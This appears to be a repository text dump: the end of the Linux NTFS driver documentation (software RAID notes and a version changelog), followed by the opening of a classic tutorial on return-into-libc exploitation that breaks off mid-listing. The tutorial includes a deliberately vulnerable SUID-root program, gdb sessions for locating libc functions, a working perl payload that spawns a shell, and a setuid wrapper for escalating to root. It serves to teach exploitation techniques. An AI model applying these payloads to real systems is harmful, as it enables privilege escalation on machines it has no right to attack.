"parity-algorithm 418 | which", where you need to replace "which" with the name of the algorithm to 419 | use (see man 5 raidtab for available algorithms) and you will have to try the 420 | different available algorithms until you find one that works. Make sure you 421 | are working read-only when playing with this as you may damage your data 422 | otherwise. If you find which algorithm works please let us know (email the 423 | linux-ntfs developers list linux-ntfs-dev[AT]lists.sourceforge[DOT]net or drop in on 424 | IRC in channel #ntfs on the irc.freenode.net network) so we can update this 425 | documentation. 426 | 427 | Once the raidtab is setup, run for example raid0run -a to start all devices or 428 | raid0run /dev/md0 to start a particular md device, in this case /dev/md0. 429 | 430 | Then just use the mount command as usual to mount the ntfs volume using for 431 | example: mount -t ntfs -o ro /dev/md0 /mnt/myntfsvolume 432 | 433 | It is advisable to do the mount read-only to see if the md volume has been 434 | setup correctly to avoid the possibility of causing damage to the data on the 435 | ntfs volume. 436 | 437 | 438 | Limitations when using the Software RAID / MD driver 439 | ----------------------------------------------------- 440 | 441 | Using the md driver will not work properly if any of your NTFS partitions have 442 | an odd number of sectors. This is especially important for linear raid as all 443 | data after the first partition with an odd number of sectors will be offset by 444 | one or more sectors so if you mount such a partition with write support you 445 | will cause massive damage to the data on the volume which will only become 446 | apparent when you try to use the volume again under Windows. 447 | 448 | So when using linear raid, make sure that all your partitions have an even 449 | number of sectors BEFORE attempting to use it. You have been warned! 450 | 451 | Even better is to simply use the Device-Mapper for linear raid and then you do 452 | not have this problem with odd numbers of sectors. 453 | 454 | 455 | ChangeLog 456 | ========= 457 | 458 | Note, a technical ChangeLog aimed at kernel hackers is in fs/ntfs/ChangeLog. 459 | 460 | 2.1.29: 461 | - Fix a deadlock when mounting read-write. 462 | 2.1.28: 463 | - Fix a deadlock. 464 | 2.1.27: 465 | - Implement page migration support so the kernel can move memory used 466 | by NTFS files and directories around for management purposes. 467 | - Add support for writing to sparse files created with Windows XP SP2. 468 | - Many minor improvements and bug fixes. 469 | 2.1.26: 470 | - Implement support for sector sizes above 512 bytes (up to the maximum 471 | supported by NTFS which is 4096 bytes). 472 | - Enhance support for NTFS volumes which were supported by Windows but 473 | not by Linux due to invalid attribute list attribute flags. 474 | - A few minor updates and bug fixes. 475 | 2.1.25: 476 | - Write support is now extended with write(2) being able to both 477 | overwrite existing file data and to extend files. Also, if a write 478 | to a sparse region occurs, write(2) will fill in the hole. Note, 479 | mmap(2) based writes still do not support writing into holes or 480 | writing beyond the initialized size. 481 | - Write support has a new feature and that is that truncate(2) and 482 | open(2) with O_TRUNC are now implemented thus files can be both made 483 | smaller and larger. 484 | - Note: Both write(2) and truncate(2)/open(2) with O_TRUNC still have 485 | limitations in that they 486 | - only provide limited support for highly fragmented files. 487 | - only work on regular, i.e. uncompressed and unencrypted files. 488 | - never create sparse files although this will change once directory 489 | operations are implemented. 490 | - Lots of bug fixes and enhancements across the board. 491 | 2.1.24: 492 | - Support journals ($LogFile) which have been modified by chkdsk. This 493 | means users can boot into Windows after we marked the volume dirty. 494 | The Windows boot will run chkdsk and then reboot. The user can then 495 | immediately boot into Linux rather than having to do a full Windows 496 | boot first before rebooting into Linux and we will recognize such a 497 | journal and empty it as it is clean by definition. 498 | - Support journals ($LogFile) with only one restart page as well as 499 | journals with two different restart pages. We sanity check both and 500 | either use the only sane one or the more recent one of the two in the 501 | case that both are valid. 502 | - Lots of bug fixes and enhancements across the board. 503 | 2.1.23: 504 | - Stamp the user space journal, aka transaction log, aka $UsnJrnl, if 505 | it is present and active thus telling Windows and applications using 506 | the transaction log that changes can have happened on the volume 507 | which are not recorded in $UsnJrnl. 508 | - Detect the case when Windows has been hibernated (suspended to disk) 509 | and if this is the case do not allow (re)mounting read-write to 510 | prevent data corruption when you boot back into the suspended 511 | Windows session. 512 | - Implement extension of resident files using the normal file write 513 | code paths, i.e. most very small files can be extended to be a little 514 | bit bigger but not by much. 515 | - Add new mount option "disable_sparse". (See list of mount options 516 | above for details.) 517 | - Improve handling of ntfs volumes with errors and strange boot sectors 518 | in particular. 519 | - Fix various bugs including a nasty deadlock that appeared in recent 520 | kernels (around 2.6.11-2.6.12 timeframe). 521 | 2.1.22: 522 | - Improve handling of ntfs volumes with errors. 523 | - Fix various bugs and race conditions. 524 | 2.1.21: 525 | - Fix several race conditions and various other bugs. 526 | - Many internal cleanups, code reorganization, optimizations, and mft 527 | and index record writing code rewritten to fit in with the changes. 528 | - Update Documentation/filesystems/ntfs.txt with instructions on how to 529 | use the Device-Mapper driver with NTFS ftdisk/LDM raid. 530 | 2.1.20: 531 | - Fix two stupid bugs introduced in 2.1.18 release. 532 | 2.1.19: 533 | - Minor bugfix in handling of the default upcase table. 534 | - Many internal cleanups and improvements. Many thanks to Linus 535 | Torvalds and Al Viro for the help and advice with the sparse 536 | annotations and cleanups. 537 | 2.1.18: 538 | - Fix scheduling latencies at mount time. (Ingo Molnar) 539 | - Fix endianness bug in a little traversed portion of the attribute 540 | lookup code. 541 | 2.1.17: 542 | - Fix bugs in mount time error code paths. 543 | 2.1.16: 544 | - Implement access time updates (including mtime and ctime). 545 | - Implement fsync(2), fdatasync(2), and msync(2) system calls. 546 | - Enable the readv(2) and writev(2) system calls. 547 | - Enable access via the asynchronous io (aio) API by adding support for 548 | the aio_read(3) and aio_write(3) functions. 549 | 2.1.15: 550 | - Invalidate quotas when (re)mounting read-write. 551 | NOTE: This now only leave user space journalling on the side. (See 552 | note for version 2.1.13, below.) 553 | 2.1.14: 554 | - Fix an NFSd caused deadlock reported by several users. 555 | 2.1.13: 556 | - Implement writing of inodes (access time updates are not implemented 557 | yet so mounting with -o noatime,nodiratime is enforced). 558 | - Enable writing out of resident files so you can now overwrite any 559 | uncompressed, unencrypted, nonsparse file as long as you do not 560 | change the file size. 561 | - Add housekeeping of ntfs system files so that ntfsfix no longer needs 562 | to be run after writing to an NTFS volume. 563 | NOTE: This still leaves quota tracking and user space journalling on 564 | the side but they should not cause data corruption. In the worst 565 | case the charged quotas will be out of date ($Quota) and some 566 | userspace applications might get confused due to the out of date 567 | userspace journal ($UsnJrnl). 568 | 2.1.12: 569 | - Fix the second fix to the decompression engine from the 2.1.9 release 570 | and some further internals cleanups. 571 | 2.1.11: 572 | - Driver internal cleanups. 573 | 2.1.10: 574 | - Force read-only (re)mounting of volumes with unsupported volume 575 | flags and various cleanups. 576 | 2.1.9: 577 | - Fix two bugs in handling of corner cases in the decompression engine. 578 | 2.1.8: 579 | - Read the $MFT mirror and compare it to the $MFT and if the two do not 580 | match, force a read-only mount and do not allow read-write remounts. 581 | - Read and parse the $LogFile journal and if it indicates that the 582 | volume was not shutdown cleanly, force a read-only mount and do not 583 | allow read-write remounts. If the $LogFile indicates a clean 584 | shutdown and a read-write (re)mount is requested, empty $LogFile to 585 | ensure that Windows cannot cause data corruption by replaying a stale 586 | journal after Linux has written to the volume. 587 | - Improve time handling so that the NTFS time is fully preserved when 588 | converted to kernel time and only up to 99 nano-seconds are lost when 589 | kernel time is converted to NTFS time. 590 | 2.1.7: 591 | - Enable NFS exporting of mounted NTFS volumes. 592 | 2.1.6: 593 | - Fix minor bug in handling of compressed directories that fixes the 594 | erroneous "du" and "stat" output people reported. 595 | 2.1.5: 596 | - Minor bug fix in attribute list attribute handling that fixes the 597 | I/O errors on "ls" of certain fragmented files found by at least two 598 | people running Windows XP. 599 | 2.1.4: 600 | - Minor update allowing compilation with all gcc versions (well, the 601 | ones the kernel can be compiled with anyway). 602 | 2.1.3: 603 | - Major bug fixes for reading files and volumes in corner cases which 604 | were being hit by Windows 2k/XP users. 605 | 2.1.2: 606 | - Major bug fixes alleviating the hangs in statfs experienced by some 607 | users. 608 | 2.1.1: 609 | - Update handling of compressed files so people no longer get the 610 | frequently reported warning messages about initialized_size != 611 | data_size. 612 | 2.1.0: 613 | - Add configuration option for developmental write support. 614 | - Initial implementation of file overwriting. (Writes to resident files 615 | are not written out to disk yet, so avoid writing to files smaller 616 | than about 1kiB.) 617 | - Intercept/abort changes in file size as they are not implemented yet. 618 | 2.0.25: 619 | - Minor bugfixes in error code paths and small cleanups. 620 | 2.0.24: 621 | - Small internal cleanups. 622 | - Support for sendfile system call. (Christoph Hellwig) 623 | 2.0.23: 624 | - Massive internal locking changes to mft record locking. Fixes 625 | various race conditions and deadlocks. 626 | - Fix ntfs over loopback for compressed files by adding an 627 | optimization barrier. (gcc was screwing up otherwise ?) 628 | Thanks go to Christoph Hellwig for pointing these two out: 629 | - Remove now unused function fs/ntfs/malloc.h::vmalloc_nofs(). 630 | - Fix ntfs_free() for ia64 and parisc. 631 | 2.0.22: 632 | - Small internal cleanups. 633 | 2.0.21: 634 | These only affect 32-bit architectures: 635 | - Check for, and refuse to mount too large volumes (maximum is 2TiB). 636 | - Check for, and refuse to open too large files and directories 637 | (maximum is 16TiB). 638 | 2.0.20: 639 | - Support non-resident directory index bitmaps. This means we now cope 640 | with huge directories without problems. 641 | - Fix a page leak that manifested itself in some cases when reading 642 | directory contents. 643 | - Internal cleanups. 644 | 2.0.19: 645 | - Fix race condition and improvements in block i/o interface. 646 | - Optimization when reading compressed files. 647 | 2.0.18: 648 | - Fix race condition in reading of compressed files. 649 | 2.0.17: 650 | - Cleanups and optimizations. 651 | 2.0.16: 652 | - Fix stupid bug introduced in 2.0.15 in new attribute inode API. 653 | - Big internal cleanup replacing the mftbmp access hacks by using the 654 | new attribute inode API instead. 655 | 2.0.15: 656 | - Bug fix in parsing of remount options. 657 | - Internal changes implementing attribute (fake) inodes allowing all 658 | attribute i/o to go via the page cache and to use all the normal 659 | vfs/mm functionality. 660 | 2.0.14: 661 | - Internal changes improving run list merging code and minor locking 662 | change to not rely on BKL in ntfs_statfs(). 663 | 2.0.13: 664 | - Internal changes towards using iget5_locked() in preparation for 665 | fake inodes and small cleanups to ntfs_volume structure. 666 | 2.0.12: 667 | - Internal cleanups in address space operations made possible by the 668 | changes introduced in the previous release. 669 | 2.0.11: 670 | - Internal updates and cleanups introducing the first step towards 671 | fake inode based attribute i/o. 672 | 2.0.10: 673 | - Microsoft says that the maximum number of inodes is 2^32 - 1. Update 674 | the driver accordingly to only use 32-bits to store inode numbers on 675 | 32-bit architectures. This improves the speed of the driver a little. 676 | 2.0.9: 677 | - Change decompression engine to use a single buffer. This should not 678 | affect performance except perhaps on the most heavy i/o on SMP 679 | systems when accessing multiple compressed files from multiple 680 | devices simultaneously. 681 | - Minor updates and cleanups. 682 | 2.0.8: 683 | - Remove now obsolete show_inodes and posix mount option(s). 684 | - Restore show_sys_files mount option. 685 | - Add new mount option case_sensitive, to determine if the driver 686 | treats file names as case sensitive or not. 687 | - Mostly drop support for short file names (for backwards compatibility 688 | we only support accessing files via their short file name if one 689 | exists). 690 | - Fix dcache aliasing issues wrt short/long file names. 691 | - Cleanups and minor fixes. 692 | 2.0.7: 693 | - Just cleanups. 694 | 2.0.6: 695 | - Major bugfix to make compatible with other kernel changes. This fixes 696 | the hangs/oopses on umount. 697 | - Locking cleanup in directory operations (remove BKL usage). 698 | 2.0.5: 699 | - Major buffer overflow bug fix. 700 | - Minor cleanups and updates for kernel 2.5.12. 701 | 2.0.4: 702 | - Cleanups and updates for kernel 2.5.11. 703 | 2.0.3: 704 | - Small bug fixes, cleanups, and performance improvements. 705 | 2.0.2: 706 | - Use default fmask of 0177 so that files are no executable by default. 707 | If you want owner executable files, just use fmask=0077. 708 | - Update for kernel 2.5.9 but preserve backwards compatibility with 709 | kernel 2.5.7. 710 | - Minor bug fixes, cleanups, and updates. 711 | 2.0.1: 712 | - Minor updates, primarily set the executable bit by default on files 713 | so they can be executed. 714 | 2.0.0: 715 | - Started ChangeLog. 716 | 717 | 718 | -------------------------------------------------------------------------------- /ret2libc.txt: -------------------------------------------------------------------------------- 1 | 2 | Exploitation - Returning into libc 3 |
                     __           __           __                     
  4 |   .-----.--.--.----.|  |.--.--.--|  |.-----.--|  |  .-----.----.-----.
  5 |   |  -__|_   _|  __||  ||  |  |  _  ||  -__|  _  |__|  _  |   _|  _  |
  6 |   |_____|__.__|____||__||_____|_____||_____|_____|__|_____|__| |___  |
  7 |    by shaun2k2 - member of excluded-team                       |_____|
  8 | 
  9 | 
 10 |                      ######################################
 11 | 		     # Exploitation - Returning into libc #
 12 | 		     ######################################
 13 | 
 14 | 				
 15 | 
 16 | 
 17 | ################
 18 | # Introduction #
 19 | ################
 20 | 
 21 | Generic vulnerabilities in applications such as the infamous "buffer overflow 
 22 | vulnerability" crop up reguarly in many immensely popular software packages 
 23 | thought to be secure by most, and programmers continue to make the same mistakes 
 24 | as a result of lazy or sloppy coding practices.  As programmers wisen up to the 
 25 | common techniques employed by hackers when exploiting buffer overflow 
 26 | vulnerabilities, the likelihood of having the ability to execute arbitrary 
 27 | shellcode on the program stack decreases.  One such example of why is the fact
 28 | that some Operating Systems are beginning to use non-exec stacks by default, 
 29 | which makes executing shellcode on the stack when exploiting a vulnerable 
 30 | application is a significantly more challenging task.  Another possibility is 
 31 | that many IDSs automatically detect simple shellcodes, making injecting 
 32 | shellcode more of a task.
 33 | As with most scenarios, with a problem comes a solution.  With a little 
 34 | knowledge of the libc functions and their operation, one can take an alternate 
 35 | approach to executing arbitrary code as a result of exploitation of a buffer 
 36 | overflow vulnerability or another bug: returning to libc.
 37 | 
 38 | 
 39 | The intention of this article is not to teach you the in's and out's of buffer 
 40 | overflows, but to explain in a little detail another technique used to execute 
 41 | arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated 
 42 | retaddr' method.  I assume readers are familiar with buffer overflow 
 43 | vulnerabilities and the basics of how to exploit them.  Also a little bit of the 
 44 | theory of memory organisation is desirable, such as how the little-endian bit 
 45 | ordering system works.  To those who are not familiar with buffer overflow bugs, 
 46 | I suggest you read "Smashing the Stack for Fun and Profit".
 47 | 
 48 | <http://www.phrack.org/phrack/49/P49-14>
 49 | 
 50 | 
 51 | #######################
 52 | # Returning into libc #
 53 | #######################
 54 | 
 55 | As the name suggests, the entire concept of the technique is that instead of 
 56 | overwriting the EIP register with the predicted or approxamate address of your 
 57 | NOP sled in memory or your shellcode, you overwrite EIP with the address of a 
 58 | function contained within the libc library, with any function arguments 
 59 | following.  An example of such would be to exploit a buffer overflow bug to
 60 | overwrite EIP with the address of system() or execl() included in the libc 
 61 | library to run an interactive shell (/bin/sh for example).  This idea is quite 
 62 | reasonable, and since it does not involve estimating return addresses and 
 63 | building large exploit buffers, this is quite an appealing technique, but it 
 64 | does have it's downsides which I shall explain later.
 65 | 
 66 | Let me demonstrate an example of the technique.  Let's say we have the following 
 67 | small example program, vulnprog:
 68 | 
 69 | 
 70 | --START
 71 | #include <stdio.h>
 72 | #include <stdlib.h>
 73 | 
 74 | int main(int argc, char *argv[]) {
 75 | 
 76 | if(argc < 2) {
 77 | printf("Usage: %s <string>\n", argv[0]);
 78 | exit(-1);
 79 | }
 80 | 
 81 | char buf[5];
 82 | 
 83 | strcpy(buf, argv[1]);
 84 | return(0);
 85 | }
 86 | 
 87 | 
 88 | gcc vulnprog.c -o vulnprog
 89 | chown root vulnprog
 90 | chmod +s vulnprog
 91 | 
 92 | --END
 93 | 
 94 | 
 95 | Anyone with a tiny bit of knowledge of buffer overflows can see that the 
 96 | preceding program is ridiculously insecure, and allows anybody who exceeds the 
 97 | bounds of `buf' to overwrite data on the stack.  It would usually be quite easy 
 98 | to write an exploit for the above example program, but let's assume that our 
 99 | friendly administrator has just read a computer security book and has enabled a 
100 | non-executable stack as a security measure.  This requires us to think a little 
101 | out of the box in order to be able to execute arbitrary code, but we already 
102 | have our solution; return into a libc function.
103 | 
104 | How, you may ask, do we actually get the information we need and prepare an 
105 | 'exploit buffer' in order to execute a libc function as a result of a buffer 
106 | overflow?  Well, all we need is the address of the desired libc function, and 
107 | the address of any function arguments.  So let's say for example we wanted to 
108 | exploit the above program (it is SUID root) to execute a shell (we want /bin/sh) 
109 | using system() - all we'd need is the address of system() and then the address 
110 | holding the string "/bin/sh" right?  Correct.  "But how do we begin to get this 
111 | info?".  That is what we're about to find out.
112 | 
113 | 
114 | --START
115 | [shaunige@localhost shaunige]$ echo "int main() { system(); }" > test.c
116 | [shaunige@localhost shaunige]$ cat test.c
117 | int main() { system(); }
118 | [shaunige@localhost shaunige]$ gcc test.c -o test
119 | [shaunige@localhost shaunige]$ gdb -q test
120 | (gdb) break main
121 | Breakpoint 1 at 0x8048342
122 | (gdb) run
123 | Starting program: /home/shaunige/test
124 | 
125 | Breakpoint 1, 0x08048342 in main ()
126 | (gdb) p system
127 | $1 = {<text variable, no debug info>} 0x4005f310 <system>
128 | (gdb) quit
129 | The program is running.  Exit anyway? (y or n) y
130 | [shaunige@localhost shaunige]$
131 | --END
132 | 
133 | 
134 | First, I create a tiny dummy program which calls the libc function 'system()' 
135 | without any arguments, and compiled it.  Next, I ran gdb ready to debug our 
136 | dummy program, and I told gdb to report breakpoints before running the dummy 
137 | program.  By examining the report, we get the location of the libc function 
138 | system() in memory - and it shall remain there until libc is recompiled.  So, 
139 | now we have the address of system(), which puts us half way there.  However, we 
140 | still need to know how we can store the string "/bin/sh" in memory and 
141 | ultimately reference it whenever needed.  Let's think about this for a moment.  
142 | Maybe we could use an environmental variable to hold the string?  Yes, infact, 
143 | an environmental variable would be ideal for this task, so let's create and use 
144 | an environment variable called $HACK to store our string ("/bin/sh").  But how 
145 | are we going to know the memory address of our environment variable and 
146 | ultimately our string?  We can write a simple utility program to grab the memory 
147 | address of the environmental variable.  Consider the following code:
148 | 
149 | 
150 | --START
151 | #include <stdio.h>
152 | #include <stdlib.h>
153 | 
154 | int main(int argc, char *argv[]) {
155 | 
156 | if(argc < 2) {
157 | printf("Usage: %s <environ_var>\n", argv[0]);
158 | exit(-1);
159 | }
160 | 
161 | char *addr_ptr;
162 | 
163 | addr_ptr = getenv(argv[1]);
164 | 
165 | if(addr_ptr == NULL) {
166 | printf("Environmental variable %s does not exist!\n", argv[1]);
167 | exit(-1);
168 | }
169 | 
170 | printf("%s is stored at address %p\n", argv[1], addr_ptr);
171 | return(0);
172 | }
173 | --END
174 | 
175 | 
176 | This program will give us the address of a given environment variable, let's 
177 | test it out:
178 | 
179 | 
180 | --START
181 | [shaunige@localhost shaunige]$ gcc getenv.c -o getenv
182 | [shaunige@localhost shaunige]$ ./getenv TEST
183 | Environmental variable TEST does not exist!
184 | [shaunige@localhost shaunige]$ ./getenv HOME
185 | HOME is stored at address 0xbffffee2
186 | [shaunige@localhost shaunige]$
187 | --END
188 | 
189 | 
190 | Great, it seems to work.  Now, let's get down to actually creating our variable 
191 | with the desired string "/bin/sh" and get the address of it.
192 | 
193 | First I create the environmental variable, and then I run our above program to 
194 | get the memory location of a desired environment variable:
195 | 
196 | 
197 | --START
198 | [shaunige@localhost shaunige]$ export HACK="/bin/sh"
199 | [shaunige@localhost shaunige]$ echo $HACK
200 | /bin/sh
201 | [shaunige@localhost shaunige]$ ./getenv HACK
202 | HACK is stored at address 0xbffff9d8
203 | [shaunige@localhost shaunige]$
204 | --END
205 | 
206 | 
207 | This is good, we now have all of the information we need to exploit the 
208 | vulnerable program: the address of 'system()' (0x4005f310) and the address of 
209 | the environmental variable $HACK holding our string "/bin/sh" (0xbffff9d8).  So, 
210 | what do we do with this stuff?  Well, like in all instances of exploiting a 
211 | buffer overflow hole, we craft an exploit buffer, but ours is somewhat different 
212 | to one you may be used to seeing, with repeated NOPs (known as a 'NOP sled'), 
213 | shellcode and repeated return addresses.  Ours exploit buffer needs to look 
214 | something like this:
215 | 
216 | 
217 | --START
218 | 
219 | 
220 | -----------------------------------------------------------------------------  
221 | |     system() addr     |     return address     |     system() argument    |
222 | -----------------------------------------------------------------------------
223 | 
224 | --END
225 | 
226 | 
227 | "But wait, I thought you said we don't need a return address?".  We don't, but 
228 | libc functions always require a return address to JuMP to after the function has 
229 | finished it's job, but we don't care if the program segmentation faults after 
230 | running the shell, so we don't even need a return address.  Instead, we'll just 
231 | specify 4 bytes of garbage data, "HACK" for example.  So, with this in mind, a 
232 | representation of our whole buffer needs to look like this:
233 | 
234 | 
235 | --START
236 | 
237 | ----------------------------------------------------------------------
238 | |  DATA-TO-OVERFLOW-BUFFER   |   0x4005f310  |  HACK  |  0xbffff9d8  |
239 | ----------------------------------------------------------------------
240 | 
241 | --END
242 | 
243 | 
244 | The data represented by 'DATA-TO-OVERFLOW-BUFFER' is just garbage data used to 
245 | overflow beyond the bounds ("boundaries") of the `buff' variable enough to 
246 | position the address of libc 'system()' function (0x4005f310) into the EIP 
247 | register.
248 | 
249 | It looks now like we have all of the information and theory of concept we need: 
250 | build a buffer containing the address of a libc function, followed by a return 
251 | address to JuMP to after executing the function, followed by any function
252 | arguments for the libc function.  The buffer will need garbage data at the 
253 | beginning so as to overflow far enough into memory to overwrite the EIP register 
254 | with the address of system() so that it jumps to it instead of the next 
255 | instruction in the program (the same technique used when using shellcode: inject 
256 | an arbitrary memory address into EIP).  Now that we have all of the necessary 
257 | theory of this technique and the required information for actually implementing 
258 | it (i.e address of a libc function and memory address of string "/bin/sh" etc), 
259 | let's exploit this bitch!
260 | 
261 | 
262 | ################
263 | # EXPLOITATION #
264 | ################
265 | 
266 | We have the necessary stuff, so let's get on with the ultimate goal: to get a 
267 | root shell by executing 'system("/bin/sh")' rather than shellcode!  Let's assume 
268 | that we are exploiting a Linux system with a non-executable stack, so we have no 
269 | other option than to 'return into libc'.
270 | 
271 | Remembering back to the diagram representation of our exploit buffer, we should 
272 | recall that garbage data must precede the buffer so that we are writing into 
273 | EIP, followed by the memory location of 'system()', then followed by a return 
274 | address which we do not need, followed by the memory address of "/bin/sh".  
275 | Let's see if we can exploit vulnprog.c this way.  If you think back, we have 
276 | already set and exported the environmental variable $HACK, but let's do it again 
277 | and grab the memory address, just for clarity's sake.
278 | 
279 | 
280 | --START
281 | [shaunige@localhost shaunige]$ export HACK="/bin/sh"
282 | [shaunige@localhost shaunige]$ echo $HACK
283 | /bin/sh
284 | [shaunige@localhost shaunige]$ ./getenv HACK
285 | HACK is stored at address 0xbffff9d8
286 | [shaunige@localhost shaunige]$
287 | --END
288 | 
289 | 
290 | Good, we now have the address of our string.  You should also remember that we 
291 | created a dummy program which called 'system()' from which we got our address of 
292 | system() with the help of GDB.  The address was 0x4005f310.  We've got the 
293 | stuff, let's write that exploit!  We'll do it with Perl from the console, 
294 | because it gives us more flexibility and more room for testing than writing a 
295 | larger program in C does.
296 | 
297 | First, we must reverse the addresses of 'system'() and the environment variable 
298 | holding "/bin/sh" due to the fact that we are working on a system using the 
299 | little-endian byte ordering system.  This gives us:
300 | 
301 | 
302 | 'system()' address:
303 | ####################
304 | 
305 | \x10\xf3\x05\x40
306 | 
307 | 
308 | $HACK's address:
309 | #################
310 | 
311 | \xd8\xf9\xff\xbf
312 | 
313 | 
314 | And we know that for the return address required by all libc functions just 
315 | needs to be a 4-byte value.  We'll just use "HACK".  Therefore, our exploit
316 | buffer looks like this so far:
317 | 
318 | 
319 | \x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf
320 | 
321 | But something is missing.  In it's current state, if fed to vulnprog, the 
322 | address of 'system()' would NOT overwrite into EIP like we want, because we 
323 | wouldn't have overflowed the 'buf' variable enough to reach the location of the 
324 | EIP register.  So, as shown on our above diagram of our exploit buffer, we're 
325 | going to need to prepend garbage data onto the beginning of our exploit buffer 
326 | to overwrite far enough into the stack region to reach EIP so that we can 
327 | overwrite that return address.  How can we know how much garbage data we need, 
328 | as it needs to be spot on?  The only reasonable way is just trial-n-error.  Due 
329 | to playing with vulnprog a little, I found that we will probably need about 6-9 
330 | words of garbage data.
331 | 
332 | 
333 | --START
334 | 
335 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x6 . 
336 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
337 | Segmentation fault
338 | 
339 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x9 . 
340 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
341 | Segmentation fault
342 | 
343 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x8 . 
344 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
345 | Segmentation fault
346 | 
347 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x7 .
348 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
349 | sh-2.05b$ whoami
350 | shaunige
351 | sh-2.05b$ exit
352 | exit
353 | [shaunige@localhost shaun]$
354 | 
355 | --END
356 | 
357 | 
358 | The exploit worked, and it needed 7 words of dummy data.  But wait, why don't we 
359 | have a rootshell?  ``vulnprog'' is SUID root, so what's going on?  'system()' 
360 | runs the specified path (in our case "/bin/sh") through /bin/sh itself, so the 
361 | privileges were dropped, thus giving us a shell, but not a rootshell.  
362 | Therefore, the exploit *did* work, but we're going to have to use a libc 
363 | function that *doesn't* drop privileges before executing the path specified 
364 | ("/bin/sh" in our scenario).  
365 | 
366 | 
367 | #####################
368 | # Using a 'wrapper' #
369 | #####################
370 | 
371 | Hmm, what to do?  We're going to have to use one of the exec() functions, as 
372 | they do not use /bin/sh, thus not dropping privileges.  First, let's make our 
373 | job a little easier, and create a little program that will run a shell for us 
374 | (called a wrapper program).  
375 | 
376 | 
377 | --START
378 | /* expl_wrapper.c */
379 | 
380 | #include <stdio.h>
381 | #include <stdlib.h>
382 | 
383 | int main() {
384 | setuid(0);
385 | setgid(0);
386 | system("/bin/sh");
387 | }
388 | --END
389 | 
390 | 
391 | We need a plan: instead of using 'system()' to run a shell, we'll overwrite the 
392 | return address on stack (EIP register) with the address of 'execl()' function in 
393 | the libc library.  We'll tell 'execl()' to execute our wrapper program 
394 | (expl_wrpper.c), which raises our privs and executes a shell.  Voila, a root 
395 | shell.  However, this is not going to be as easy as the last experiment.  For a 
396 | start, the execl() function needs NULLs as the last function argument, but 
397 | 'strcpy()' in vulnprog.c will think that a NULL (\x00 in hex representation) 
398 | means the end of the string, thus making the exploit fail.  Instead, we can use 
399 | 'printf()' to write NULLs without NULL's appearing in the exploit buffer.  Our 
400 | exploit buffer needs to this time look like this:
401 | 
402 | 
403 | --START
404 | 
405 | -------------------------------------------------------------------------------
406 | GARBAGE|printf() addr|execl() addr| %3$n addr|wrapper addr|wrapper addr|addr of 
407 | here |-------------------------------------------------------------------------
408 | ------
409 | 
410 | --END
411 | 
412 | 
413 | You may notice "%3$n addr".  This is a format string for 'printf()', and due to 
414 | direct parameter access, it will skip over the two "wrapper addr" addresses, and 
415 | place NULLs at the end of the exploit buffer.  This time, the address of 
416 | 'printf()' is overwritten into EIP, executing 'printf()' first, followed by the 
417 | execution of our wrapper program.  This will result in a rootshell since 
418 | vulnprog is SUID root.
419 | 
420 | 'addr of here' needs to be the address of itself, which will be overwritten by 
421 | NULLs when 'printf()' skips over the first 2 parameters of the 'execl' call.
422 | 
423 | To get the addresses of 'printf()' and 'execl()' libc library functions, we'll 
424 | again write a tiny test program, and use GDB to help us out.
425 | 
426 | 
427 | --START
428 | /* test.c */
429 | 
430 | #include <stdio.h>
431 | 
432 | int main() {
433 | execl();
434 | printf(0);
435 | }
436 | 
437 | [shaunige@localhost shaunige]$ gcc test.c -o test -g
438 | [shaunige@localhost shaunige]$ gdb -q ./test
439 | (gdb) break main
440 | Breakpoint 1 at 0x804837c: file test.c, line 4.
441 | (gdb) run
442 | Starting program: /home/shaunige/test
443 | 
444 | Breakpoint 1, main () at test.c:4
445 | 4               execl();
446 | (gdb) p execl
447 | $1 = {<text variable, no debug info>} 0x400bde80 <execl>
448 | (gdb) p printf
449 | $2 = {<text variable, no debug info>} 0x4006e310 <printf>
450 | (gdb) quit
451 | The program is running.  Exit anyway? (y or n) y
452 | [shaunige@localhost shaunige]$
453 | --END
454 | 
455 | 
456 | Excellent, just as we wanted, we have now the addresses of libc 'execl()' and 
457 | 'printf()'.  We'll be using 'printf()' to write NULLs (with the format string 
458 | "%3$n"), so we'll need to write the printf() format string %3$n into memory.  
459 | Using the format string %3$n to write NULLs works because it uses direct 
460 | positional parameters (hence the '$' in the format string) - %3 tells it to skip 
461 | over the first two function arguments of 'execl()' (address of our wrapper 
462 | program followed by the address of the wrapper program again), and writes NULLs 
463 | into the location after the second argument of the execl function.  Let's use an 
464 | environment variable again, due to past success with them.  We'll use also an 
465 | environment variable to store the path of our wrapper program which invokes a 
466 | shell, "/home/shaunige/wrapper".
467 | 
468 | 
469 | --START
470 | [shaunige@localhost shaunige]$ export NULLSTR="%3\$n"
471 | [shaunige@localhost shaunige]$ echo $NULLSTR
472 | %3$n
473 | [shaunige@localhost shaunige]$ export WRAPPER_PROG="/home/shaunige/wrapper"
474 | [shaunige@localhost shaunige]$ echo $WRAPPER_PROG
475 | /home/shaunige/wrapper
476 | [shaunige@localhost shaunige]$ ./getenv NULLSTR
477 | NULLSTR is stored at address 0xbfffff5f
478 | [shaunige@localhost shaunige]$ ./getenv WRAPPER_PROG
479 | WRAPPER_PROG is stored at address 0xbffff9a9
480 | [shaunige@localhost shaunige]$
481 | --END
482 | 
483 | 
484 | We now have all of the addresses which we need, except the last argument: 'addr 
485 | of here'.  This needs to be the address of the buffer when it is copied over.  
486 | It needs to be the memory address of the overflowable 'buf' variable + 48 bytes. 
487 |  But how will we get the address of 'buf'?  All we need to do is add an extra 
488 | line of code to vulnprog.c, recompile it, and we will have the address in memory 
489 | of 'buf':
490 | 
491 | 
492 | --START
493 | [shaunige@localhost shaunige]$ cat vulnprog.c
494 | #include <stdio.h>
495 | #include <stdlib.h>
496 | 
497 | int main(int argc, char *argv[]) {
498 | if(argc < 2) {
499 | printf("Usage: %s <string>\n", argv[0]);
500 | exit(-1);
501 | }
502 | 
503 | char buf[5];
504 | 
505 | printf("addr of buf is: %p\n", buf);
506 | 
507 | strcpy(buf, argv[1]);
508 | return(0);
